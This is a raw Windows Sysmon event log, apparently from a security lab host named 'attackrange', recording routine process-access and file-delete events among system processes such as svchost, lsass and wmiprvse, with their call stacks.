18:14:50.546{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.514{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.514{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.514{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.467{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.467{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.467{B81B27B7-4013-611D-1600-00000000C801}11966624C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.446{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.430{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.430{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.414{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.414{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.414{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.414{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.414{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.383{B81B27B7-4013-611D-1600-00000000C801}1196NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\WindowsUpdate.logMD5=038356387332650843BCB352BB89A101,SHA256=492C9B102256321FB5598FF87ED5BCCAB8159F36DD8416CE4011FFBF5E96048D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7664AA3084A71D233022E6321D0EDC83,SHA256=D25D6D8E5A26456F614FCE66CEF748F4B0C27A4241B41E9F4EE127CFECDCDB6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.267{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.267{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.267{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.267{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.267{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5A90-03000000C801}5444C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.245{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-4F1A-613A-5A90-03000000C801}5444C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.245{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.245{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.245{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 